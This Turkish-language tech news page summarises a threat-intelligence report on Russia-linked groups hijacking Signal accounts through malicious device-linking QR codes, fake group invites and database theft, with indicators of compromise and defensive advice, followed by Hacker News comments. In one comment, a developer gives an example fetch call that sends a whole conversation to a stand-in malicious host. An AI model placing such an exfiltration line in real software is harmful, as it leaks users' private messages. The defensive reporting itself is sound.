1 puan yazan GN⁺ 2025-02-20 | 2 yorum | WhatsApp'ta paylaş
  • Rus istihbarat kurumlarının ilgi alanındaki kişilerin kullandığı Signal hesapları yoğun şekilde hedef alınırken, hassas devlet ve askeri iletişimi amaçlayan hesap ele geçirme girişimleri artıyor
  • En yaygın kullanılan yöntem, meşru Linked Devices özelliğinin kötüye kullanılarak kurbana kötü amaçlı bir QR kodunun taratılması ve ardından mesajların saldırgan cihazına gerçek zamanlı senkronize edilmesi
  • UNC5792 sahte Signal grup davetlerini, UNC4221 Kropyva temalı phishing kitlerini ve sahte güvenlik uyarılarını, APT44 ise ele geçirilen cihazlara erişim üzerinden cihaz bağlama yöntemini kullanıyor
  • APT44, Turla ve Belarus bağlantılı UNC1151 gibi gruplar; Android ve Windows ortamlarında Signal veritabanını ya da Signal Desktop mesajları ile eklerini çalma yetenekleri de kullanıyor
  • Sorun yalnızca Signal ile sınırlı değil; WhatsApp ve Telegram da benzer şekilde hedef alındığından uygulama güncellemeleri, bağlı cihazların kontrolü, QR kodlarına dikkat edilmesi ve güçlü ekran kilidi gerekiyor

Signal hesaplarını hedef alan Rusya bağlantılı faaliyetler

  • Google Threat Intelligence Group (GTIG), Rus devletiyle bağlantılı birden fazla tehdit aktörünün Signal Messenger hesaplarını ele geçirme girişimlerini artırdığını doğruladı
  • Başlıca hedefler, Rus istihbarat kurumlarının ilgi alanına giren kişiler; Ukrayna’nın yeniden işgalinden sonra hassas devlet ve askeri iletişime erişme yönündeki savaş zamanı ihtiyacı bu faaliyetleri büyüttü
  • Signal; askerler, siyasetçiler, gazeteciler, aktivistler ve yüksek riskli topluluklar tarafından kullanılan güvenli bir mesajlaşma uygulaması olduğu için gözetleme ve istihbarat faaliyetleri açısından yüksek değerli bir hedef haline geldi
  • Benzer tehditler, WhatsApp ve Telegram gibi diğer popüler mesajlaşma uygulamalarına da yayılıyor ve Rusya bağlantılı gruplar benzer teknikleri uyguluyor
  • Signal’in en güncel Android ve iOS sürümleri, benzer phishing kampanyalarına karşı savunmaya yardımcı olan güçlendirmeler içeriyor
    • Kullanıcıların bu özelliklerden yararlanabilmesi için en son sürüme güncelleme yapması gerekiyor

Linked Devices özelliğinin kötüye kullanılması

  • En yeni ve en yaygın teknik, Signal’in meşru bir özelliği olan linked devices işlevinin kötüye kullanılması
  • Signal, birden fazla cihazda eşzamanlı kullanım için ek cihaz bağlanırken normalde QR kodu taranmasını ister
  • Tehdit aktörleri, kurban taradığında saldırgan kontrolündeki Signal örneğini kurbanın hesabına bağlayan kötü amaçlı QR kodları oluşturur
  • Bağlantı başarılı olursa mesajlar daha sonra kurban ve saldırgana gerçek zamanlı olarak senkronize edilir; böylece tüm cihazı ele geçirmeden güvenli görüşmeler izlenmeye devam edilebilir
  • Uzaktan phishing senaryolarında kötü amaçlı QR kodları çoğunlukla şu şekillerde gizlenir
    • Signal grup daveti
    • Güvenlik uyarısı
    • Signal web sitesindeki meşru cihaz eşleştirme talimatları
  • Daha özelleştirilmiş uzaktan phishing senaryolarında, Ukrayna ordusunun kullandığı özel uygulamalara benzeyen phishing sayfalarına kötü amaçlı cihaz bağlama QR kodları yerleştirilir
  • Aynı yöntem yakın erişim operasyonlarında da kullanılır
    • APT44, cepheye konuşlandırılan Rus askerlerinin ele geçirdiği cihazlardaki Signal hesaplarını saldırgan kontrolündeki altyapıya bağlayarak sonraki kötüye kullanımların önünü açar
  • Yeni bağlanan cihazlar üzerinden hesap ele geçirilmesi, merkezi teknik tespit ve savunma imkanlarının sınırlı olması nedeniyle düşük sinyalli bir ilk erişim yöntemi olmaya elverişlidir
    • Başarılı olduğunda ihlalin uzun süre fark edilmeden kalma riski yüksektir

UNC5792: değiştirilmiş Signal grup davetleri

  • UNC5792, Rus istihbarat faaliyeti olduğundan şüphelenilen bir küme ve CERT-UA’nın UAC-0195 takibiyle kısmen örtüşüyor
  • Bu grup, Signal’in meşru group invite sayfasını değiştirerek phishing kampanyalarında kullanıyor
  • Normal akışta kullanıcıyı bir Signal grubuna yönlendiren bu sayfa, değiştirilmiş sürümde kurbanın Signal hesabına saldırgan kontrolündeki bir cihazı bağlayan kötü amaçlı bir URL’ye gönderiyor
  • Saldırgan kontrolündeki altyapı, meşru bir Signal grup daveti gibi görünecek şekilde yapılandırılıyor
  • Sahte grup davetinin JavaScript kodu, standart Signal grup katılım yönlendirmesi yerine sgnl://linkdevice?uuid= biçimindeki Signal yeni cihaz bağlama URI’sini içeren kötü amaçlı bir blokla değiştiriliyor
  • Örnek alan adı olarak signal-groups[.]tech tespit edildi

UNC4221: özelleştirilmiş Signal phishing kiti

  • UNC4221, CERT-UA tarafından UAC-0185 olarak izlenen Rusya bağlantılı bir tehdit aktörü ve Ukraynalı askerlerin kullandığı Signal hesaplarını yoğun biçimde hedef alıyor
  • Bu grup, Ukrayna ordusunun topçu yönlendirmesinde kullandığı Kropyva uygulamasının bileşenleri gibi görünen özelleştirilmiş bir Signal phishing kiti kullanıyor
  • UNC4221 de UNC5792’ye benzer şekilde, güvenilir bir kişiden gelmiş gibi görünen Signal grup davetlerinin içine cihaz bağlama özelliğini gizliyor
  • Gözlenen phishing kiti varyantları çeşitli biçimlerde ortaya çıktı
    • Kurbanı Signal’in sağladığı meşru cihaz bağlama talimatları gibi görünen ikinci aşama phishing altyapısına yönlendiren phishing web siteleri
    • Temel Kropyva temalı phishing kitine kötü amaçlı cihaz bağlama QR kodunun doğrudan eklendiği web siteleri
    • 2022’deki ilk operasyonlarda, Signal’in meşru güvenlik uyarılarına benzeyecek şekilde tasarlanmış phishing sayfaları
  • Örnek alan adları ve sayfalar arasında signal-confirm[.]site, teneta.add-group[.]site, signal-protect[.]host bulunuyor
  • UNC4221, Signal hedefleme faaliyetinin temel bileşenlerinden biri olarak PINPOINT adlı hafif bir JavaScript yükü de kullanıyor
    • PINPOINT, tarayıcının GeoLocation API’si aracılığıyla temel kullanıcı bilgileri ve konum verilerini topluyor
  • Gelecekteki benzer operasyonlarda güvenlik mesajları ile konum verilerinin birlikte hedef alınması muhtemel
    • Özellikle hedefli gözetleme operasyonları veya konvansiyonel askeri operasyonları destekleme bağlamında bu iki veri birlikte hedeflenebilir

Signal mesajlarını çalmak için Rusya ve Belarus bağlantılı faaliyetler

  • Bilinen çeşitli bölgesel tehdit aktörleri, kurban hesaplarına ek cihaz bağlama yönteminin yanı sıra Android ve Windows cihazlarda Signal veritabanı dosyalarını çalma yetenekleri de kullanıyor
  • APT44, WAVESIGN adlı hafif bir Windows Batch betiği kullanıyor
    • Kurbanın Signal veritabanından düzenli aralıklarla Signal mesajlarını sorguluyor
    • Son mesajları Rclone ile dışarı aktarıyor
  • 2023’te Ukrayna Security Service of Ukraine (SSU) ve Birleşik Krallık National Cyber Security Centre (NCSC) tarafından raporlanan Infamous Chisel Android zararlısı Sandworm’e atfediliyor
    • Android cihazlarda Signal dahil çeşitli mesajlaşma uygulamalarının yerel veritabanları gibi dosya uzantı listelerini özyinelemeli olarak aramak üzere tasarlanmış
  • Turla, Rus FSB Center 16’ya atfedilen bir Rus tehdit aktörü
    • İhlal sonrası Windows ortamlarında Signal Desktop mesajlarını dışarı aktarmaya hazırlayan hafif bir PowerShell betiği kullanıyor
  • Belarus bağlantılı UNC1151, Robocopy komut satırı aracını kullanıyor
    • Signal Desktop’ın mesajları ve ekleri depoladığı dosya dizininin içeriğini daha sonra dışarı aktarılmak üzere hazırlıyor

Güvenli mesajlaşma uygulaması kullanıcıları için savunma önlemleri

  • Birden fazla tehdit aktörünün Signal’e yoğunlaşması, güvenli mesajlaşma uygulamalarına yönelik tehditlerin kısa vadede şiddetlenebileceğini gösteriyor
  • Ticari casus yazılım endüstrisinin büyümesi ve çatışma bölgelerinde kullanılan mobil zararlı yazılım varyantlarının artmasıyla birlikte, hassas iletişimi gözetlemeye yönelik saldırgan siber yeteneklere olan talep de büyüyor
  • Tehdit yalnızca phishing ve zararlı yazılım dağıtımı gibi uzaktan siber operasyonlarla sınırlı değil
    • Saldırganın hedefin kilidi açık cihazına kısa süreli erişim elde ettiği yakın erişim operasyonları da önemli bir risk oluşturuyor
  • Sadece Signal değil, WhatsApp ve Telegram da çeşitli Rusya bağlantılı grupların son dönemdeki öncelikli hedefleri arasında yer alıyor
    • Microsoft Threat Intelligence, COLDRIVER, UNC4057 ve Star Blizzard’ın WhatsApp hesaplarını ele geçirmek için Linked Devices özelliğini kötüye kullanmaya çalıştığı kampanyaları yakın tarihli blog yazısında ele aldı
  • Devlet destekli sızma faaliyetlerinin hedefi olabilecek kullanıcılar şu savunma alışkanlıklarını uygulamalı
    • Tüm mobil cihazlarda ekran kilidini etkinleştirin ve büyük-küçük harf, sayı ve sembol karışımından oluşan uzun ve karmaşık parolalar kullanın
    • Android, alfasayısal parolaları destekler ve bu yöntem sayısal PIN ya da desen kilidine göre çok daha yüksek güvenlik sağlar
    • İşletim sistemi güncellemelerini mümkün olan en kısa sürede yükleyin; Signal ve diğer mesajlaşma uygulamalarını her zaman güncel tutun
    • Google Play Services bulunan Android cihazlarda varsayılan olarak etkin olan Google Play Protect özelliğini açık bırakın
    • Uygulama ayarlarındaki “Linked devices” bölümünü düzenli olarak kontrol ederek yetkisiz cihaz olup olmadığını denetleyin
    • Yazılım güncellemesi, grup daveti veya başka bildirimler gibi görünerek anında işlem yapmanızı isteyen QR kodları ve web kaynaklarına karşı dikkatli olun
    • Mümkün olduğunda hesap oturum açma ya da yeni cihaz bağlama işlemlerini doğrulamak için parmak izi, yüz tanıma, güvenlik anahtarı veya tek kullanımlık kod gibi iki aşamalı doğrulamaları kullanın
    • Hedefli gözetleme veya istihbarat faaliyeti riski bulunan iPhone kullanıcıları, saldırı yüzeyini azaltmak için Lockdown Mode etkinleştirmeyi değerlendirmeli

İhlal göstergeleri ve gözlenen tekniklerin özeti

  • Kurumların tehdit avcılığı ve tespit çalışmalarına yardımcı olmak için, kayıtlı kullanıcılar için sunulan GTI Collection içinde ihlal göstergeleri yer alıyor
  • İlgili ihlal göstergelerine örnekler şunlar
    • UNC5792: e078778b62796bab2d7ab2b04d6b01bf, değiştirilmiş grup daveti HTML kodu örneği
    • UNC5792 sahte grup daveti phishing sayfaları: add-signal-group[.]com, add-signal-groups[.]com, group-signal[.]com, groups-signal[.]site, signal-device-off[.]online, signal-group-add[.]com, signal-group[.]site, signal-group[.]tech, signal-groups-add[.]com, signal-groups[.]site, signal-groups[.]tech, signal-security[.]online, signal-security[.]site, signalgroup[.]site, signals-group[.]com
    • UNC4221 cihaz bağlama talimatı phishing sayfaları: signal-confirm[.]site, confirm-signal[.]site
    • UNC4221 sahte Signal güvenlik uyarısı: signal-protect[.]host
    • UNC4221 sahte Kropyva grup davetleri: teneta.join-group[.]online, teneta.add-group[.]site, group-teneta[.]online, helperanalytics[.]ru, teneta[.]group, group.kropyva[.]site
    • APT44: 150.107.31[.]194:18000, APT44 tarafından sağlanan dinamik olarak oluşturulmuş cihaz bağlama QR kodu
    • APT44 WAVESIGN Batch betikleri: a97a28276e4f88134561d938f60db495, b379d8f583112cad3cf60f95ab3a67fd, b27ff24870d93d651ee1d8e06276fa98
  • Gözlenen tehdit aktörlerine göre taktik ve teknikler şöyle
    • UNC5792: sahte grup davetleri kullanan uzaktan phishing ile kurbanın Signal mesajlarını saldırgan kontrolündeki cihaza eşliyor
    • UNC4221: sahte askeri web uygulamaları ve güvenlik uyarıları kullanan uzaktan phishing ile kurbanın Signal mesajlarını saldırgan kontrolündeki cihaza eşliyor
    • APT44: fiziksel olarak eriştiği cihazları kötüye kullanarak kurbanın Signal mesajlarını saldırgan kontrolündeki cihaza eşliyor
    • APT44: Infamous Chisel adlı Android zararlısıyla Signal veritabanı dosyalarını dışarı aktarmayı hedefliyor
    • APT44: Windows Batch betiğiyle son Signal mesajlarını Rclone üzerinden düzenli olarak dışarı aktarıyor
    • Turla: Windows ortamı ihlal edildikten sonra Signal Desktop veritabanını çalmaya yönelik faaliyet yürütüyor
    • UNC1151: Robocopy ile Signal Desktop dosya dizinini dışarı aktarmaya hazır hale getiriyor

2 yorum

 
ndrgrd 2025-02-20

Zayıf olduğu doğru ama grup sohbetlerini bile düzgün şekilde şifrelemeyen Telegram'ın güvenlik konusunda eleştiri yapması başlı başına komik.

 
GN⁺ 2025-02-20
Hacker News yorumları
  • Signal gibi bağlı cihaz iş akışı olan uygulamalar aslında epey uzun zamandır riskliydi
    Geçen yıl Telegram Signal'i küçümserken de bu noktaya değinmişti(https://news.ycombinator.com/context?id=40303736) ve bana göre Signal'in bağlı cihaz uygulamasında uzun zamandır sorun vardı: https://eprint.iacr.org/2021/626.pdf
    Gerçek saldırı örneklerinin kamuya açık literatürde ortaya çıkmasının bu kadar uzun sürmesi daha da şaşırtıcı. Signal'in bu saldırıyı kendi tehdit modelinin dışında görmesi de yardımcı olmadı. İlgili makaleye göre Signal, 20 Ekim 2020'de bildirimi aldıktan sonra 28 Ekim'de verdiği yanıtta uzun vadeli gizli anahtarın ele geçirilmesini saldırgan modeline dahil etmediğini söyledi

    • Doğru okuduysam bu saldırı, saldırganın kullanıcının cihazında saklanan özel anahtara (IK) ve kullanıcının parolasına zaten sahip olduğunu varsayıyor
      Bu durumda kurbanın cihazlarından birine fiziksel erişim ya da başka bir arka kapı gerekmiyor mu? O seviyedeyse zaten oyun bitmiş gibi geliyor. Yanlışsam düzeltin. Fiziksel donanım güvenliği ve phishing'den korunma hâlâ kilit unsur gibi görünüyor
    • O makaledeki saldırı, Signal protokolündeki diğer anahtarları türetmek için kullanılan kullanıcının uzun vadeli özel kimlik anahtarının (IK) zaten ele geçirilmiş olduğunu varsayıyor
      Laboratuvar dışında bunu elde etmenin yolu genelde kullanıcının cihazında root erişimi kazanmak ya da yakın tarihli sohbet yedeklerini ele geçirmekten ibaret. Google'ın tespit ettiği kampanya phishing'e daha yakın olduğu için teknik olarak daha az ciddi, ancak kullanıcıyı riskli bir davranış içindeyken nasıl uyaracağınız, kullanılabilirlik güvenliğinin tamamını ilgilendiren zorlu bir mesele. Yeni bir bağlı cihaz eklenirken mesaj geçmişi ve son 45 güne ait ekler de kopyalanmaya başladığında bu, Signal için daha önemli bir sorun olacak
    • Bağlı cihaz özelliği kullanılmazsa bu saldırı yüzeyinin de azalıyor olup olmadığını merak ediyorum
  • Son zamanlarda daha çok hissettiğim şey, uçtan uca şifrelemenin nihayetinde son kullanıcı tarafından istemcinin doğrudan derlenip doğrulanabilmesini gerektirdiği.
    Şifrelenmiş CRDT tabanlı bir şifreli yapay zeka sohbet hizmeti geliştiriyorum; render tarafına tek satırlık bir fetch ya da bir analiz takipçisi eklense bile protokolün vaat ettiği güvenlik boşa çıkıyor. Hatta render’ın çalıştığı işletim sistemine kadar güvenmek zorundasınız.
    İstemciyi açık kaynak yapıp yeniden üretilebilir derlemeler sağlasanız bile iOS Store üzerinden dağıtmanız gerekir ve yayın sürecinde her şey olabilir. iOS’u örnek vermemin sebebi, kendi derlediğiniz uygulamaları yüklemenin özellikle zor olması. Çok taraflı bir sohbette karşı tarafın da aynı süreçten geçmesi gerekir.
    Her türlü harika protokolü ve en iyi aktarım katmanı şifrelemesini kullansanız da sonunda her şey güven meselesi. Signal gibi bir şey kullanınca tamamen güvenli bir ortamda olduğunuz yanılgısıyla aksine daha çok gözetim hedefi haline gelip gelmediğimizden endişe ediyorum. Bir devlet kurumu gözetim yapmak istiyorsa, saklayacak en çok şeyi olan Signal kullanıcılarına kaynak ayırır gibi geliyor.
    Bazen şifreli depolama dışında her şey anlamsız geliyor. Tartışmaların çoğunun matematik merkezli güvenlik protokollerinin geçerliliğinde kalması da garip. Render katmanında tek satırlık fetch("[https://malvevolentactor.com](<https://malvevolentactor.com>;)", {body: JSON.stringify(convo)}) ile her şey aşılabiliyorken, bu konuda ne düşündüğünüzü merak ediyorum.

    • Sonuçta CPU silikonuna dönüşen kumdan işletim sistemine, paketlerin iletilme biçimine kadar tüm hattı kontrol edemiyorsanız, bir yerde bir güven köküne dayanmanız gerekir.
      Güveni tamamen ortadan kaldırmak imkansız görünüyor; sadece neye güveneceğimizi başka bir yere taşıyor ya da soyutlamaların arkasına saklıyoruz. Bundan sonra daha önemli hale gelecek olan, belli ölçüde güvenilen aktörlerin kötü niyetli davrandığını açıkça kanıtlayıp onları sorumlu tutmayı sağlayan mekanizmalar.
      Örneğin ortadaki adam saldırılarını önlemeye yardımcı olan sertifika şeffaflığı günlükleri, alınan ikili dosyanın yayımlanmış açık kaynak kodla eşleşip eşleşmediğini kontrol eden yeniden üretilebilir derlemeler, WhatsApp/Signal/iMessage’de NSA anahtarı yerine beklenen açık anahtarı alıp almadığınızı doğrulayan anahtar şeffaflığı gibi şeyler.
    • Şifreleme yöntemlerinin teorik statüsüne giderek daha fazla takılıp, farklı sonuçların gerçek risklerini geri plana atma konusunda araba atın önüne geçmiş gibi geliyor.
      Aşırı güvenli olmaya çalışan sistemler kullanıcının kendi mesajlarını okuyamamasına yol açabilir ve sonunda onları daha az güvenli sistemlere itebilir. Matrix’te de oturum kapatıldığında mesajların kalıcı olarak kaçırılabileceğini istemci yeterince açık anlatamadığı için sorun yaşanmıştı.
      Tam ileri gizlilik gibi bazı güçlü gereksinimler, kullanıcıların mesajlaşmada pratik olarak istedikleriyle çatışabilir. Kullanıcının istediği şey, “Mesajlarımı ben istediğim zaman görebileyim, başkası asla göremesin,” ama bunu sağlamak çok zor. Güvenlik ile parola sıfırlama ve telefon kaybı sonrası kurtarma arasında temel bir gerilim var.
      İnsanlar olası sonuçları tamamen anlasaydı, önemli bir kısmı en güçlü uçtan uca şifrelemeyi istemeyebilirdi. Bunun yerine “Bir başkası mesajlarımı görürse ömür boyu hapis” gibi güçlü yasal güvenceler isteyebilirlerdi. En üst düzey teknik güvenliği isteyen insanlar elbette var, ama tasarımı bu önceliğe göre yapmak, o ödünleşimi kabul etmeyen kullanıcılarda ters tepebilir.
    • Uçtan uca şifreleme ile istemci-sunucu şifreleme arasındaki farkı dert edecek kadar gerçekten güvenli olması gereken bir şeyi iOS ve Google Play Services üzerinde inşa etmek bana oldukça anlamsız geliyor.
      Bu düzeyde güvenliği önemseyen biri muhtemelen iPhone yerine başka bir şey kullanmaya çalışır. Signal savunucularının hoşlanmadıkları şifreleme sistemlerini kullananlara LARPer demesi tipik bir yansıtma gibi görünüyor. ABD devleti için çalışanlar gibi durumlar dışında Signal’in gerçekten hangi tehdit modeline uyduğunu pek bilmiyorum.
      Akademik kriptografi araştırmacılarının matematiksel algoritmalara odaklanmasında belirgin bir sokak lambası etkisi de var. Günümüzde güvenlik araştırma fonu alınabilen alan biraz genişledi ve uçtan uca mesajlaşma protokollerinin oyuncak modellerini de kapsıyor, ama gerçekte önemli olan insandan insana tüm hattı kapsamak için hâlâ yetersiz.
    • Söylediklerinizin bir kısmına bazen kanıtlama (attestation) deniyor.
      Temelde, güvendiğiniz bir kök otorite imza atarak, etkileşim kurduğunuz şeyin hangi telefon+işletim sistemi+uygulamadan geldiğini şüpheye yer bırakmadan doğruluyor.
      Android’de bu var; örneğin üçüncü bir tarafa kilitli bootloader, Google imzası ve çalışan şeyin Google işletim sistemi olduğunu doğrulayabiliyor. Teoride başka bir güven zinciri kullanıp, Google telefonu+Lineage OS gibi “orijinal” yazılımların uzak tarafça kabul edilmesini sağlamak da mümkün.
      Uygulama da, işletim sisteminin erişebildiği uygulama imzasını doğrulayıp gerekirse uzak tarafa sunabilir. Google gibi tek bir aktöre körü körüne güvenmeyen tamamen şeffaf kanıtlama çıktıları için, imza güven kökü yerine doğrulanan bileşenlerin hash’lerini ve ikili dosyalarını içeren bir kayıt defteri kullanılabilir.
      Bunların hepsi teknik olarak mümkün, ama bugün gerçekten uygulanabilir şekilde hayata geçirilmiş değiller. Yeterince ilgi olursa sonunda uygulanacaklarını düşünüyorum.
    • Burada gündeme getirilen sorunlar kesinlikle gerçek, ancak sanki 10-15 yıl önce iletişimin ne halde olduğu unutuluyor.
      O zamanlar hiçbir şey şifrelenmiyordu, halka açık Wi‑Fi’da bir şey yapmak Rus ruleti gibiydi ve sinyal istihbarat kurumları altın çağını yaşıyordu. O dönemde ağ şifrelemesi daha yüksek önceliğe sahipti.
  • Makalede açıkça yazmıyor ama benim anladığım kadarıyla saldırılardan birinin ilk adımı ölen bir askerin akıllı telefonunu ele geçirmek.

    • Makalede, saldırganların kötü amaçlı QR kodları oluşturarak kurbanın Signal’e saldırganın cihazını bağlamasını sağladığı söyleniyor.
      Başarılı olursa, sonrasında mesajlar gerçek zamanlı olarak hem kurbana hem saldırgana aynı anda iletiliyor.
    • Ciddiye alınacak bir konuysa, askerlere akıllı telefonun standart ekipman olarak verilmesi sorununu gündeme getiriyor.
      Ama akıllı telefonlar, ayrı bir eğitim gerektirmeden her askere güçlü bir bilişim ve iletişim platformu sağlıyor. Sorun, üstteki yorumdaki riskler de dahil olmak üzere bunu nasıl güvenli hale getireceğimiz.
      Rus istihbaratının bile etkili biçimde suistimal edemeyeceği kadar iyi korunan bir yöntemi birilerinin araştırıyor olması muhtemel. Böyle bir çözüm yaygınlaşırsa sivil mahremiyetine de iyi uygulanabilir. Ukraynalı sivillerin telefonlarını Rus saldırganlardan korumak da kötü bir fikir sayılmaz.
    • Askerlerin telefon taşımasına izin verilmiyor.
  • Eğer kastedilen şey, tek bir QR kod taramasıyla cihazın bağlanabilmesi ise, bence açık olan şey tam da bu.
    Sadece kod taranarak cihaz bağlanmamalı; “Evet, bu cihaza bağlanacağım” gibi manuel bir onay olmalı. Böylece biri bunu grup davet kodu sanıp tarasa bile, aslında öyle olmadığını fark edebilir. Elbette yine kullanıcının fark etmesi gerekir, ama “gruba katılım kodu sanıp taradım ve sessizce başka bir cihaz bağlandı” durumuna göre anlamlı bir iyileştirme olur

    • Signal'in teknik olmayan kullanıcılar için tasarlandığını unutmamak gerekir
      Birçok kullanıcı QR kod, bağlantı, bağlama gibi şeyleri anlamaz ve bunlar üzerinde derinlemesine düşünmez. Anlık ve içgüdüsel tahminlerle tıklarlar; çoğu zaman da ekrandan kaldırıp yaptıkları işe dönmek için basarlar. Onay adımı olmadığı sonucuna varmak için bir dayanak var mı bilmiyorum; Signal belgelerine bakınca anlaşılabilir
  • İlgili haber: https://www.wired.com/story/russia-signal-qr-code-phishing-a... (https://web.archive.org/web/20250219110740/https://www.wired..., https://archive.ph/MbR9e)
    Bunu https://news.ycombinator.com/item?id=43103692 üzerinden gördüm ama orada yorum yok

  • İyi haber şu ki hedef alınmasının bir nedeni var. Bu, Signal'in hâlâ etkili olduğu anlamına geliyor

  • Signal'in tehlikeye girdiğini söyleyen çok kişi var, ama neredeyse her durumda onların Signal'den daha az açık kaynaklı olduğunu görmek gerekiyor
    Signal, web ölçeğinde bir şirket hâline gelirken bile insan haklarını korumak için elinden geleni yapıyor. Bireysel onur önemlidir. Mesele sadece sohbet değil

    • “Kimin” tehlikeye attığı konusunda kafam karışık. Rusya mı, ABD istihbaratı mı, bilmiyorum
      Signal Foundation sitesinde yönetim kurulu üyelerine kısaca baktım; Council on Foreign Relations, World Economic Forum Young Global Leader, Truman National Security Project security fellow, U.S. Department of State Foreign Affairs Policy Board gibi ifadeler gördüm
      Bu insanlar istihbarat dünyasının bir parçası gibi geliyor. Signal gibi açık kaynaklı bir mesajlaşma uygulamasının yönetim kurulunda tam olarak ne yaptıklarını merak ediyorum. Bunun sadece sohbet olmadığını söylemene katılıyorum
    • Telegram özellikle daha kötü. Kendi şifrelemesini ve kendi protokolünü kullanıyor, varsayılan olarak hiç uçtan uca şifreleme sunmuyor ve her şeyi sunucuda düz metin olarak saklıyor
    • Genel olarak çok fazla yanlış bilginin olduğu zorlu bir ortam ve Signal gibi değerli hedefler için bu daha da geçerli
      Signal güvenliyse, mahremiyete saldıran taraf insanların Signal'in tehlikeye girdiğine inanıp başka bir şey kullanmasını ister. Güvenli değilse, bu kez insanların Signal'in güvenli olduğuna inanmasını ister
      Çözümün, potansiyel yanlış bilgi kaynaklarını, özellikle de sosyal medyadaki rastgele kullanıcıları tamamen görmezden gelmek olduğunu düşünüyorum. HN de buna dahil. Toplumsal merkezin böyle yerlerde olduğu zaman bu zorlaşıyor ve kişinin kendini dışarıda bırakması gerekiyor. Meşru ve güvenilir seslerle sınırlı kalınmalı
    • “Web ölçeğinde” ifadesini hâlâ ciddiyetle kullanan biri olduğunu bilmiyordum
      “MongoDB web ölçeğindedir. Sadece açın, anında ölçeklenir”
  • Ayarlar menüsünden beklenmedik bağlı cihazlar olup olmadığı kontrol edilebilir

    • Signal'in bağlı cihazları kullanıcı arayüzünde her zaman doğrudan göstermesi iyi olur mu diye merak ediyorum
      “3 etkin bağlı cihaz” gibi küçük bir simge gösterilebilir
    • İyi fikir. QR kodu göndereceğim
  • Bazı alan adları verilmiş ama hepsi kaydedilmemiş
    Örneğin signal-protect[.]host ve kropyva[.]site kullanılabilir durumda, signal-confirm[.]site ise Ukrayna'da kayıtlı. Bazıları Rusya'da kayıtlı
    Savaş hâlindeki ülkelere hangi taraf olursa olsun güvenmemek gerekir. A, B'yi suçlar ve B, A'yı suçlar ama iki tarafın da kendi gündemi vardır

    • signal-confirm[.]site alan adının Ukrayna'da kayıtlı olması, WHOIS verileri sık sık sahte olduğu için, tek başına güçlü bir dayanak sayılmaz
      Rusya'nın bu tür işler için Ukrayna dahil komşu ülkelerden ele geçirilmiş kimlik bilgileri ya da SIM kartlar da kullandığı biliniyor
    • Kötü niyetli aktörün alan adının Ukrayna'da kayıtlı olması, otomatik olarak Ukrayna'nın çıkarları için hareket ettiği ya da Ukrayna makamlarının bundan haberdar olduğu anlamına gelmez
      Ne yazık ki Rus devlet aktörleri de Ukrayna içinde faaliyet göstermekte zorlanmıyor. Buna, daha çok para verene çalışan karmaşık suçluları, Rusya'nın geçici olarak işgal ettiği bölgeler ile Ukrayna arasında her gün gidip gelen insanları da ekleyince işler hızla karmaşıklaşıyor
    • Kayıt edilmemiş alan adları bile, örneğin payload analizi sırasında bulunmuşsa, ihlal göstergesi olabilir